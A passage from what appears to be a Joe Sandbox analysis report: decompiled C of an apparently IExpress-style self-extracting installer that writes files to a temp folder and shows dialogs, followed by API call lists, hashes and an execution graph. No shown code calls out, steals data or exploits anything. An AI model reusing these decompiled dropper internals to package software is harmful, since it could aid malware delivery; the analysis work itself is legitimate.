                            					E00EB43D0(_t34, _t15);
                            					_v520 = 0;
                            					LoadStringA( *0xeb9a3c, _a16,  &_v520, 0x200);
                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                            					MessageBeep(0xffffffff);
                            					goto L6;
                            				} else {
                            					if(_t14 != 1) {
                            						L4:
                            						_t23 = 0;
                            					} else {
                            						_t32 = _a12;
                            						if(_t32 - 0x83d > 1) {
                            							goto L4;
                            						} else {
                            							EndDialog(_t34, _t32);
                            							L6:
                            							_t23 = 1;
                            						}
                            					}
                            				}
                            				return E00EB6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                            			}













                            0x00eb19e0
                            0x00eb19e0
                            0x00eb19eb
                            0x00eb19f2
                            0x00eb19f9
                            0x00eb19fc
                            0x00eb1a01
                            0x00eb1a2a
                            0x00eb1a2e
                            0x00eb1a3e
                            0x00eb1a4f
                            0x00eb1a62
                            0x00eb1a6a
                            0x00000000
                            0x00eb1a03
                            0x00eb1a06
                            0x00eb1a20
                            0x00eb1a20
                            0x00eb1a08
                            0x00eb1a08
                            0x00eb1a14
                            0x00000000
                            0x00eb1a16
                            0x00eb1a18
                            0x00eb1a70
                            0x00eb1a72
                            0x00eb1a72
                            0x00eb1a14
                            0x00eb1a06
                            0x00eb1a81

                            APIs
                            • EndDialog.USER32(?,?), ref: 00EB1A18
                            • GetDesktopWindow.USER32 ref: 00EB1A24
                            • LoadStringA.USER32(?,?,00000200), ref: 00EB1A4F
                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00EB1A62
                            • MessageBeep.USER32(000000FF), ref: 00EB1A6A
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                            • String ID:
                            • API String ID: 1273765764-0
                            • Opcode ID: 110781a78be00cc0ca76b2e072557bd938bafe2c15e715b16e672e158fd19e99
                            • Instruction ID: 2b08116d8eacacffdcffac89b9da41739af6c670057947a18801cbfe3fedd853
                            • Opcode Fuzzy Hash: 110781a78be00cc0ca76b2e072557bd938bafe2c15e715b16e672e158fd19e99
                            • Instruction Fuzzy Hash: A4110871601109AFDB40EF68EE08AEF77B8EF09310F4042A0F512F3191DA30AE05CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E00EB63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                            				signed int _v8;
                            				char _v268;
                            				long _v272;
                            				void* _v276;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t15;
                            				long _t28;
                            				struct _OVERLAPPED* _t37;
                            				void* _t39;
                            				signed int _t40;
                            
                            				_t15 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t15 ^ _t40;
                            				_v272 = _v272 & 0x00000000;
                            				_push(__ecx);
                            				_v276 = _a16;
                            				_t37 = 1;
                            				E00EB1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
                            				E00EB658A( &_v268, 0x104, _a12);
                            				_t28 = 0;
                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                            				if(_t39 != 0xffffffff) {
                            					_t28 = _a4;
                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                            						 *0xeb9124 = 0x80070052;
                            						_t37 = 0;
                            					}
                            					CloseHandle(_t39);
                            				} else {
                            					 *0xeb9124 = 0x80070052;
                            					_t37 = 0;
                            				}
                            				return E00EB6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                            			}















                            0x00eb63cb
                            0x00eb63d2
                            0x00eb63d8
                            0x00eb63ea
                            0x00eb63f3
                            0x00eb6401
                            0x00eb6402
                            0x00eb6410
                            0x00eb6415
                            0x00eb6433
                            0x00eb6438
                            0x00eb6449
                            0x00eb6463
                            0x00eb646d
                            0x00eb6477
                            0x00eb6477
                            0x00eb647a
                            0x00eb643a
                            0x00eb643a
                            0x00eb6444
                            0x00eb6444
                            0x00eb6492

                            APIs
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB642D
                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB645B
                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB647A
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB63EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleWrite
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            • API String ID: 1065093856-388467436
                            • Opcode ID: 0f353d0c0f27ad22df11c6e15e413a8473345e9d22d78bc2fd120044509b5422
                            • Instruction ID: f72f838deec616cc3fffe4884a17ff22470d03c0f0d5159ed21bdb27fe36b850
                            • Opcode Fuzzy Hash: 0f353d0c0f27ad22df11c6e15e413a8473345e9d22d78bc2fd120044509b5422
                            • Instruction Fuzzy Hash: D021C371A01218AFDB21DF26DC85FEB77A8EB45314F0042A9A695B3280DAB45D888F64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB47E0(intOrPtr* __ecx) {
                            				intOrPtr _t6;
                            				intOrPtr _t9;
                            				void* _t11;
                            				void* _t19;
                            				intOrPtr* _t22;
                            				void _t24;
                            				struct HWND__* _t25;
                            				struct HWND__* _t26;
                            				void* _t27;
                            				intOrPtr* _t28;
                            				intOrPtr* _t33;
                            				void* _t34;
                            
                            				_t33 = __ecx;
                            				_t34 = LocalAlloc(0x40, 8);
                            				if(_t34 != 0) {
                            					_t22 = _t33;
                            					_t27 = _t22 + 1;
                            					do {
                            						_t6 =  *_t22;
                            						_t22 = _t22 + 1;
                            					} while (_t6 != 0);
                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                            					 *_t34 = _t24;
                            					if(_t24 != 0) {
                            						_t28 = _t33;
                            						_t19 = _t28 + 1;
                            						do {
                            							_t9 =  *_t28;
                            							_t28 = _t28 + 1;
                            						} while (_t9 != 0);
                            						E00EB1680(_t24, _t28 - _t19 + 1, _t33);
                            						_t11 =  *0xeb91e0; // 0xd582b0
                            						 *(_t34 + 4) = _t11;
                            						 *0xeb91e0 = _t34;
                            						return 1;
                            					}
                            					_t25 =  *0xeb8584; // 0x0
                            					E00EB44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                            					LocalFree(_t34);
                            					L2:
                            					return 0;
                            				}
                            				_t26 =  *0xeb8584; // 0x0
                            				E00EB44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                            				goto L2;
                            			}















                            0x00eb47e8
                            0x00eb47f0
                            0x00eb47f4
                            0x00eb480f
                            0x00eb4811
                            0x00eb4814
                            0x00eb4814
                            0x00eb4816
                            0x00eb4817
                            0x00eb4829
                            0x00eb482b
                            0x00eb482f
                            0x00eb484f
                            0x00eb4852
                            0x00eb4855
                            0x00eb4855
                            0x00eb4857
                            0x00eb4858
                            0x00eb4860
                            0x00eb4865
                            0x00eb486a
                            0x00eb486f
                            0x00000000
                            0x00eb4876
                            0x00eb4831
                            0x00eb4841
                            0x00eb4847
                            0x00eb480b
                            0x00000000
                            0x00eb480b
                            0x00eb47f6
                            0x00eb4806
                            0x00000000

                            APIs
                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00EB4E6F), ref: 00EB47EA
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00EB4823
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00EB4847
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB4851
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Local$Alloc$FreeLoadMessageString
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            • API String ID: 359063898-388467436
                            • Opcode ID: 0c145ad12750f6798c3a7f172a41b5155209f9f7ebe47b166e9ac6dfb1ac5749
                            • Instruction ID: ed1c2a5638bd3c6b6100341774d39a13ca6dd006e15fe8861b020b395770cd31
                            • Opcode Fuzzy Hash: 0c145ad12750f6798c3a7f172a41b5155209f9f7ebe47b166e9ac6dfb1ac5749
                            • Instruction Fuzzy Hash: 60110AF56046416FD7199F34AC18FB7375AE785300F049619FA42F7382DA359C0A8660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB3680(void* __ecx) {
                            				void* _v8;
                            				struct tagMSG _v36;
                            				int _t8;
                            				struct HWND__* _t16;
                            
                            				_v8 = __ecx;
                            				_t16 = 0;
                            				while(1) {
                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                            					if(_t8 == 0) {
                            						break;
                            					}
                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                            						continue;
                            					} else {
                            						do {
                            							if(_v36.message != 0x12) {
                            								DispatchMessageA( &_v36);
                            							} else {
                            								_t16 = 1;
                            							}
                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                            						} while (_t8 != 0);
                            						if(_t16 == 0) {
                            							continue;
                            						}
                            					}
                            					break;
                            				}
                            				return _t8;
                            			}







                            0x00eb368c
                            0x00eb368f
                            0x00eb3691
                            0x00eb369f
                            0x00eb36a7
                            0x00000000
                            0x00000000
                            0x00eb36ba
                            0x00000000
                            0x00eb36bc
                            0x00eb36bc
                            0x00eb36c0
                            0x00eb36cb
                            0x00eb36c2
                            0x00eb36c4
                            0x00eb36c4
                            0x00eb36da
                            0x00eb36e0
                            0x00eb36e6
                            0x00000000
                            0x00000000
                            0x00eb36e6
                            0x00000000
                            0x00eb36ba
                            0x00eb36ed

                            APIs
                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00EB369F
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36B2
                            • DispatchMessageA.USER32(?), ref: 00EB36CB
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EB36DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                            • String ID:
                            • API String ID: 2776232527-0
                            • Opcode ID: affebaee3411c24f2c453fe3dadd4394a4dfadb812bba62dbbf944389b08b0e8
                            • Instruction ID: add9a14f560fb49e4bc4e462204ae76552342e5d1314149507db36393a212277
                            • Opcode Fuzzy Hash: affebaee3411c24f2c453fe3dadd4394a4dfadb812bba62dbbf944389b08b0e8
                            • Instruction Fuzzy Hash: 0801A7729012147BDF308BBB5C49EEB777CEBC9B10F040229F905F2184D561C644C661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00EB65E8(char* __ecx) {
                            				char _t3;
                            				char _t10;
                            				char* _t12;
                            				char* _t14;
                            				char* _t15;
                            				CHAR* _t16;
                            
                            				_t12 = __ecx;
                            				_t15 = __ecx;
                            				_t14 =  &(__ecx[1]);
                            				_t10 = 0;
                            				do {
                            					_t3 =  *_t12;
                            					_t12 =  &(_t12[1]);
                            				} while (_t3 != 0);
                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                            				while(1) {
                            					_t16 = CharPrevA(_t15, ??);
                            					if(_t16 <= _t15) {
                            						break;
                            					}
                            					if( *_t16 == 0x5c) {
                            						L7:
                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                            							_t16 = CharNextA(_t16);
                            						}
                            						 *_t16 = _t10;
                            						_t10 = 1;
                            					} else {
                            						_push(_t16);
                            						continue;
                            					}
                            					L11:
                            					return _t10;
                            				}
                            				if( *_t16 == 0x5c) {
                            					goto L7;
                            				}
                            				goto L11;
                            			}









                            0x00eb65e8
                            0x00eb65ed
                            0x00eb65ef
                            0x00eb65f2
                            0x00eb65f4
                            0x00eb65f4
                            0x00eb65f6
                            0x00eb65f7
                            0x00eb6608
                            0x00eb6611
                            0x00eb6618
                            0x00eb661c
                            0x00000000
                            0x00000000
                            0x00eb660e
                            0x00eb6623
                            0x00eb6625
                            0x00eb663b
                            0x00eb663b
                            0x00eb663d
                            0x00eb6641
                            0x00eb6610
                            0x00eb6610
                            0x00000000
                            0x00eb6610
                            0x00eb6644
                            0x00eb6647
                            0x00eb6647
                            0x00eb6621
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00EB2B33), ref: 00EB6602
                            • CharPrevA.USER32(?,00000000), ref: 00EB6612
                            • CharPrevA.USER32(?,00000000), ref: 00EB6629
                            • CharNextA.USER32(00000000), ref: 00EB6635
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Char$Prev$Next
                            • String ID:
                            • API String ID: 3260447230-0
                            • Opcode ID: 83c5e4b59062f306c5de847014e7846abd4aa2a5b77d7c8e9f0434dd1f393a34
                            • Instruction ID: 8401887d70c4299ba85d284e126ffe722ec7c269493d340e8a387760f18d2239
                            • Opcode Fuzzy Hash: 83c5e4b59062f306c5de847014e7846abd4aa2a5b77d7c8e9f0434dd1f393a34
                            • Instruction Fuzzy Hash: 96F028720061506EEB321B2D9CC89FBBF9CDF87358F2D02BFE4D1B2015D6190D0A8AA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB69B0() {
                            				intOrPtr* _t4;
                            				intOrPtr* _t5;
                            				void* _t6;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            
                            				 *0xeb81f8 = E00EB6C70();
                            				__set_app_type(E00EB6FBE(2));
                            				 *0xeb88a4 =  *0xeb88a4 | 0xffffffff;
                            				 *0xeb88a8 =  *0xeb88a8 | 0xffffffff;
                            				_t4 = __p__fmode();
                            				_t11 =  *0xeb8528; // 0x0
                            				 *_t4 = _t11;
                            				_t5 = __p__commode();
                            				_t12 =  *0xeb851c; // 0x0
                            				 *_t5 = _t12;
                            				_t6 = E00EB7000();
                            				if( *0xeb8000 == 0) {
                            					__setusermatherr(E00EB7000);
                            				}
                            				E00EB71EF(_t6);
                            				return 0;
                            			}








                            0x00eb69b7
                            0x00eb69c2
                            0x00eb69c8
                            0x00eb69cf
                            0x00eb69d8
                            0x00eb69de
                            0x00eb69e4
                            0x00eb69e6
                            0x00eb69ec
                            0x00eb69f2
                            0x00eb69f4
                            0x00eb6a00
                            0x00eb6a07
                            0x00eb6a0d
                            0x00eb6a0e
                            0x00eb6a15

                            APIs
                              • Part of subcall function 00EB6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00EB6FC5
                            • __set_app_type.MSVCRT ref: 00EB69C2
                            • __p__fmode.MSVCRT ref: 00EB69D8
                            • __p__commode.MSVCRT ref: 00EB69E6
                            • __setusermatherr.MSVCRT ref: 00EB6A07
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                            • String ID:
                            • API String ID: 1632413811-0
                            • Opcode ID: e343d44dca1d7b3f53219caa87079b2336f50ed2969e75b2357834b0f32a5e8a
                            • Instruction ID: 21abc37e8c2c65fe68babd542e49c92229bc6bfca18b4ec61456efb15612d6ea
                            • Opcode Fuzzy Hash: e343d44dca1d7b3f53219caa87079b2336f50ed2969e75b2357834b0f32a5e8a
                            • Instruction Fuzzy Hash: 39F0F8701093068FDB68AF76AE1A6573BA6FB44321B141729E4A1B63F0CF3A8548CA11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB6952(CHAR* __ecx) {
                            				long _v8;
                            				long _v12;
                            				long _v16;
                            				char _v20;
                            				int _t22;
                            
                            				_t22 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v20 = 0;
                            				_v16 = 0;
                            				if( *__ecx != 0) {
                            					_t6 =  &_v20; // 0xeb5760
                            					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                            						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                            					}
                            				}
                            				return _t22;
                            			}








                            0x00eb695b
                            0x00eb6960
                            0x00eb6963
                            0x00eb6966
                            0x00eb6969
                            0x00eb696c
                            0x00eb6972
                            0x00eb6987
                            0x00eb699f
                            0x00eb699f
                            0x00eb6987
                            0x00eb69a7

                            APIs
                            • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W,?,00000000,00EB5760,?,A:\), ref: 00EB697F
                            • MulDiv.KERNEL32(?,?,00000400), ref: 00EB6999
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DiskFreeSpace
                            • String ID: `W
                            • API String ID: 1705453755-2113494416
                            • Opcode ID: 74b3e2bfb837ca116b3cc74edd277347ceb7d6901c5626818198a5c56f633d23
                            • Instruction ID: 451bead45182a14693718418a7f9119ebccec4703d4963d9b5b5209f8103a4e2
                            • Opcode Fuzzy Hash: 74b3e2bfb837ca116b3cc74edd277347ceb7d6901c5626818198a5c56f633d23
                            • Instruction Fuzzy Hash: 3CF097B6D1122CBBDB11DFE98944ADFBBBCEB48700F144296E510F6240D6759A058BD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:26.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:965
                            Total number of Limit Nodes:41
                            execution_graph 2196 944cd0 2197 944cf4 2196->2197 2198 944d0b 2196->2198 2199 944d02 2197->2199 2200 944b60 FindCloseChangeNotification 2197->2200 2198->2199 2202 944dcb 2198->2202 2205 944d25 2198->2205 2253 946ce0 2199->2253 2200->2199 2203 944dd4 SetDlgItemTextA 2202->2203 2206 944de3 2202->2206 2203->2206 2204 944e95 2205->2199 2219 944c37 2205->2219 2206->2199 2227 94476d 2206->2227 2210 944e38 2210->2199 2236 944980 2210->2236 2215 944e64 2244 9447e0 LocalAlloc 2215->2244 2218 944e6f 2218->2199 2220 944c4c DosDateTimeToFileTime 2219->2220 2221 944c88 2219->2221 2220->2221 2222 944c5e LocalFileTimeToFileTime 2220->2222 2221->2199 2224 944b60 2221->2224 2222->2221 2223 944c70 SetFileTime 2222->2223 2223->2221 2225 944b76 SetFileAttributesA 2224->2225 2226 944b92 FindCloseChangeNotification 2224->2226 2225->2199 2226->2225 2258 9466ae GetFileAttributesA 2227->2258 2229 94477b 2229->2210 2230 9447cc SetFileAttributesA 2232 9447db 2230->2232 2232->2210 2235 9447c2 2235->2230 2237 944990 2236->2237 2238 9449a5 2237->2238 2239 9449c2 lstrcmpA 2237->2239 2240 9444b9 20 API calls 2238->2240 2241 9449ba 2239->2241 2242 944a0e 2239->2242 2240->2241 2241->2199 2241->2215 2242->2241 2323 94487a 2242->2323 2245 9447f6 2244->2245 2246 94480f LocalAlloc 2244->2246 2247 9444b9 20 API calls 2245->2247 2249 94480b 2246->2249 2250 944831 2246->2250 2247->2249 2249->2218 2251 9444b9 20 API calls 2250->2251 2252 944846 LocalFree 2251->2252 2252->2249 2254 946ce8 2253->2254 2255 946ceb 2253->2255 2254->2204 2336 946cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2255->2336 2257 946e26 2257->2204 2259 944777 2258->2259 2259->2229 2259->2230 2260 946517 FindResourceA 2259->2260 2261 946536 LoadResource 2260->2261 2262 94656b 2260->2262 2261->2262 2263 946544 DialogBoxIndirectParamA FreeResource 2261->2263 2267 9444b9 2262->2267 2263->2262 2265 9447b1 2263->2265 2265->2230 2265->2232 2265->2235 2268 9444fe LoadStringA 2267->2268 2269 94455a 2267->2269 2270 944527 2268->2270 2271 944562 2268->2271 2272 946ce0 4 API calls 2269->2272 2296 94681f 2270->2296 2276 9445c9 2271->2276 2282 94457e LocalAlloc 2271->2282 2274 944689 2272->2274 2274->2265 2278 944607 LocalAlloc 2276->2278 2279 9445cd LocalAlloc 2276->2279 2277 944536 MessageBoxA 2277->2269 2278->2269 2290 9445c4 2278->2290 2279->2269 2284 9445f3 2279->2284 2282->2269 2289 9445af 2282->2289 2287 94171e _vsnprintf 2284->2287 2285 94462d MessageBeep 2288 94681f 10 API calls 2285->2288 2287->2290 2291 94463b 2288->2291 2313 94171e 2289->2313 2290->2285 2293 944645 MessageBoxA LocalFree 2291->2293 2295 9467c9 EnumResourceLanguagesA 2291->2295 2293->2269 2295->2293 2297 946857 GetVersionExA 2296->2297 2306 94691a 2296->2306 2300 94687c 2297->2300 2297->2306 2298 946ce0 4 API calls 2299 94452c 2298->2299 2299->2277 2307 9467c9 2299->2307 2301 9468a5 GetSystemMetrics 2300->2301 2300->2306 2302 9468b5 RegOpenKeyExA 2301->2302 2301->2306 2303 9468d6 RegQueryValueExA RegCloseKey 2302->2303 2302->2306 2304 94690c 2303->2304 2303->2306 2317 9466f9 2304->2317 2306->2298 2308 946803 2307->2308 2309 9467e2 2307->2309 2308->2277 2321 946793 EnumResourceLanguagesA 2309->2321 2311 9467f5 2311->2308 2322 946793 EnumResourceLanguagesA 2311->2322 2314 94172d 2313->2314 2315 94173d _vsnprintf 2314->2315 2316 94175d 2314->2316 2315->2316 2316->2290 2318 94670f 2317->2318 2319 946740 CharNextA 2318->2319 2320 94674b 2318->2320 2319->2318 2320->2306 2321->2311 2322->2308 2324 9448a2 CreateFileA 2323->2324 2326 944908 2324->2326 2327 9448e9 2324->2327 2326->2241 2327->2326 2328 9448ee 2327->2328 2331 94490c 2328->2331 2332 9448f5 CreateFileA 2331->2332 2333 944917 2331->2333 2332->2326 2333->2332 2334 944962 CharNextA 2333->2334 2335 944953 CreateDirectoryA 2333->2335 2334->2333 2335->2334 2336->2257 2337 944ad0 2345 943680 2337->2345 2340 944aee WriteFile 2342 944b14 2340->2342 2343 944b0f 2340->2343 2341 944ae9 2342->2343 2344 944b3b SendDlgItemMessageA 2342->2344 2344->2343 2346 943691 MsgWaitForMultipleObjects 2345->2346 2347 9436e8 2346->2347 2348 9436a9 PeekMessageA 2346->2348 2347->2340 2347->2341 2348->2346 2349 9436bc 2348->2349 2349->2346 2349->2347 2350 9436c7 DispatchMessageA 2349->2350 2351 9436d1 PeekMessageA 2349->2351 2350->2351 2351->2349 3128 943210 3129 943227 3128->3129 3130 94328e EndDialog 3128->3130 3131 943235 3129->3131 3132 9433e2 GetDesktopWindow 3129->3132 3146 943239 3130->3146 3136 94324c 3131->3136 3137 9432dd GetDlgItemTextA 3131->3137 3131->3146 3181 9443d0 6 API calls 3132->3181 3140 9432c5 EndDialog 3136->3140 3141 943251 3136->3141 3139 943366 3137->3139 3147 9432fc 3137->3147 3138 94341f GetDlgItem EnableWindow 3138->3146 3143 9444b9 20 API calls 3139->3143 3140->3146 3142 94325c LoadStringA 3141->3142 3141->3146 3144 943294 3142->3144 3145 94327b 3142->3145 3143->3146 3166 944224 LoadLibraryA 3144->3166 3150 9444b9 20 API calls 3145->3150 3147->3139 3149 943331 GetFileAttributesA 3147->3149 3152 94337c 3149->3152 3153 94333f 3149->3153 3150->3130 3155 94658a CharPrevA 3152->3155 3156 9444b9 20 API calls 3153->3156 3154 9432a5 SetDlgItemTextA 3154->3145 3154->3146 3157 94338d 3155->3157 3158 943351 3156->3158 3159 9458c8 27 API calls 3157->3159 3158->3146 3160 94335a CreateDirectoryA 3158->3160 3161 943394 3159->3161 3160->3139 3160->3152 3161->3139 3162 9433a4 3161->3162 3163 9433c7 EndDialog 3162->3163 3164 94597d 34 API calls 3162->3164 3163->3146 3165 9433c3 3164->3165 3165->3146 3165->3163 3167 944246 GetProcAddress 3166->3167 3168 9443b2 3166->3168 3169 9443a4 FreeLibrary 3167->3169 3170 94425d GetProcAddress 3167->3170 3172 9444b9 20 API calls 3168->3172 3169->3168 3170->3169 3171 944274 GetProcAddress 3170->3171 3171->3169 3173 94428b 3171->3173 3174 94329d 3172->3174 3175 944295 GetTempPathA 3173->3175 3180 9442e1 3173->3180 3174->3146 3174->3154 3176 9442ad 3175->3176 3176->3176 3177 9442b4 CharPrevA 3176->3177 3178 9442d0 CharPrevA 3177->3178 3177->3180 3178->3180 3179 944390 FreeLibrary 3179->3174 3180->3179 3183 944463 SetWindowPos 3181->3183 3184 946ce0 4 API calls 3183->3184 3185 9433f1 SetWindowTextA SendDlgItemMessageA 3184->3185 3185->3138 3185->3146 3186 944a50 3187 944a66 3186->3187 3188 944a9f ReadFile 3186->3188 3189 944abb 3187->3189 3190 944a82 memcpy 3187->3190 3188->3189 3190->3189 3191 943450 3192 9434d3 EndDialog 3191->3192 3193 94345e 3191->3193 3194 94346a 3192->3194 3195 94349a GetDesktopWindow 3193->3195 3199 943465 3193->3199 3196 9443d0 11 API calls 3195->3196 3197 9434ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3196->3197 3197->3194 3198 94348c EndDialog 3198->3194 3199->3194 3199->3198 2352 